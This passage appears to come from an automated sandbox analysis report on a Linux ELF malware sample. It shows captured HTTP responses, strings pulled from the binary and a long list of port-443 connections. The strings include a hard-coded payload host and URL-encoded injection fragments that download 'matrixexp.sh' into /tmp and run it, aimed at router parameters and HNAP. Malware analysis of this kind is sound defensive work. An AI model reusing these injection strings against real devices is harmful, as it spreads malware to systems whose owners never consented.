77 3a 20 30 20 30 20 31 65 78 20 23 33 33 66 66 33 33 2c 20 30 20 30 20 32 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 38 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 6e 6f 69 73 65 20 7b 0d 0a 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Thu, 21 Mar 2024 04:23:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Mar 2024 04:23:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 08:23:43 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 08:23:43 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/arm7;chmod
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/matrixexp.sh
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&sessionKey=1039230
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/matrixexp.sh;
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/mips
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/mips;
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/mpsl;chmod
          Source: AFWaD3vnqR.elfString found in binary or memory: http://109.205.214.35/x86
          Source: AFWaD3vnqR.elf, 5446.1.00007ffd8cc58000.00007ffd8cc79000.rw-.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpan
          Source: AFWaD3vnqR.elfString found in binary or memory: http://purenetworks.com/HNAP1/
          Source: AFWaD3vnqR.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: AFWaD3vnqR.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
          Source: unknownNetwork traffic detected: HTTP traffic on port 43354 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60414 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37760
          Source: unknownNetwork traffic detected: HTTP traffic on port 35172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38610
          Source: unknownNetwork traffic detected: HTTP traffic on port 39374 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34248
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36432
          Source: unknownNetwork traffic detected: HTTP traffic on port 56434 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39942
          Source: unknownNetwork traffic detected: HTTP traffic on port 47430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60532
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57376
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34250
          Source: unknownNetwork traffic detected: HTTP traffic on port 54654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40924
          Source: unknownNetwork traffic detected: HTTP traffic on port 44680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35458 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52918
          Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46228
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48402
          Source: unknownNetwork traffic detected: HTTP traffic on port 52186 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 32902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53328 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48880
          Source: unknownNetwork traffic detected: HTTP traffic on port 34488 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43190
          Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38600
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59566
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60540
          Source: unknownNetwork traffic detected: HTTP traffic on port 55464 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56052
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33390
          Source: unknownNetwork traffic detected: HTTP traffic on port 60082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45366
          Source: unknownNetwork traffic detected: HTTP traffic on port 43182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 38610 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43182
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40906
          Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58238
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51600
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37742
          Source: unknownNetwork traffic detected: HTTP traffic on port 35504 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57130 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52174 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34232
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33384
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36888
          Source: unknownNetwork traffic detected: HTTP traffic on port 56376 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55190 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39420 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44026
          Source: unknownNetwork traffic detected: HTTP traffic on port 60368 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48866
          Source: unknownNetwork traffic detected: HTTP traffic on port 40752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45358
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48864
          Source: unknownNetwork traffic detected: HTTP traffic on port 46804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36256 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46684
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45354
          Source: unknownNetwork traffic detected: HTTP traffic on port 57874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43176
          Source: unknownNetwork traffic detected: HTTP traffic on port 33838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38380 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42658 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36880
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33368
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39910
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36400
          Source: unknownNetwork traffic detected: HTTP traffic on port 54482 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60562
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56074
          Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56076
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 55980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46678
          Source: unknownNetwork traffic detected: HTTP traffic on port 51962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47524
          Source: unknownNetwork traffic detected: HTTP traffic on port 37112 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46496 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55554 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49300
          Source: unknownNetwork traffic detected: HTTP traffic on port 48792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33642 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55148
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39986
          Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40338 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47626 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58662
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55150
          Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48448
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40960
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50700
          Source: unknownNetwork traffic detected: HTTP traffic on port 47192 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46264
          Source: unknownNetwork traffic detected: HTTP traffic on port 55828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47590
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37792
          Source: unknownNetwork traffic detected: HTTP traffic on port 58238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44082
          Source: unknownNetwork traffic detected: HTTP traffic on port 52792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55158
          Source: unknownNetwork traffic detected: HTTP traffic on port 51286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60982
          Source: unknownNetwork traffic detected: HTTP traffic on port 34718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34284
          Source: unknownNetwork traffic detected: HTTP traffic on port 56618 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46258
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48434
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47104
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44072
          Source: unknownNetwork traffic detected: HTTP traffic on port 37926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43276 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59524
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37786
          Source: unknownNetwork traffic detected: HTTP traffic on port 39616 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34278
          Source: unknownNetwork traffic detected: HTTP traffic on port 36866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36448
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39958
          Source: unknownNetwork traffic detected: HTTP traffic on port 43882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46644 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48428
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48426
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48422
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47574
          Source: unknownNetwork traffic detected: HTTP traffic on port 40796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47570
          Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52904
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36440
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59536
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35598
          Source: unknownNetwork traffic detected: HTTP traffic on port 48940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35594
          Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34260
          Source: unknownNetwork traffic detected: HTTP traffic on port 34284 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40930
          Source: unknownNetwork traffic detected: HTTP traffic on port 38138 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37688 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32902
          Source: unknownNetwork traffic detected: HTTP traffic on port 55432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
          Source: unknownNetwork traffic detected: HTTP traffic on port 54462 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36036
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
          Source: unknownNetwork traffic detected: HTTP traffic on port 54032 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45326 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40584 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60138
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
          Source: unknownNetwork traffic detected: HTTP traffic on port 48976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47524 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47156
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48486
          Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38682
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36024
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
          Source: unknownNetwork traffic detected: HTTP traffic on port 60160 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
          Source: unknownNetwork traffic detected: HTTP traffic on port 49660 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
          Source: unknownNetwork traffic detected: HTTP traffic on port 39026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60160
          Source: unknownNetwork traffic detected: HTTP traffic on port 58778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46290
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37342
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51682
          Source: unknownNetwork traffic detected: HTTP traffic on port 60708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
          Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
          Source: unknownNetwork traffic detected: HTTP traffic on port 42748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60156
          Source: unknownNetwork traffic detected: HTTP traffic on port 46078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42536 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33204 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36248 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35402 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46288
          Source: unknownNetwork traffic detected: HTTP traffic on port 44516 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46284
          Source: unknownNetwork traffic detected: HTTP traffic on port 52194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39512
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51696
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35148
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35156
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49308
          Source: unknownNetwork traffic detected: HTTP traffic on port 40084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
          Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32944
          Source: unknownNetwork traffic detected: HTTP traffic on port 60090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51620
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56088
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56084
          Source: unknownNetwork traffic detected: HTTP traffic on port 60184 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60570
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44920
          Source: unknownNetwork traffic detected: HTTP traffic on port 35050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58260
          Source: unknownNetwork traffic detected: HTTP traffic on port 56986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60578
          Source: unknownNetwork traffic detected: HTTP traffic on port 46722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36060
          Source: unknownNetwork traffic detected: HTTP traffic on port 51466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
          Source: unknownNetwork traffic detected: HTTP traffic on port 45244 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51632
          Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41408
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58278
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60100
          Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41404
          Source: unknownNetwork traffic detected: HTTP traffic on port 45698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56098
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58272
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42734
          Source: unknownNetwork traffic detected: HTTP traffic on port 35422 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60104
          Source: unknownNetwork traffic detected: HTTP traffic on port 36186 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36400 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52244 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
          Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36050
          Source: unknownNetwork traffic detected: HTTP traffic on port 36060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37386
          Source: unknownNetwork traffic detected: HTTP traffic on port 53640 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49360
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36058
          Source: unknownNetwork traffic detected: HTTP traffic on port 45768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40548
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60112
          Source: unknownNetwork traffic detected: HTTP traffic on port 47700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33584 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44900
          Source: unknownNetwork traffic detected: HTTP traffic on port 57220 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35270 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48028
          Source: unknownNetwork traffic detected: HTTP traffic on port 41980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
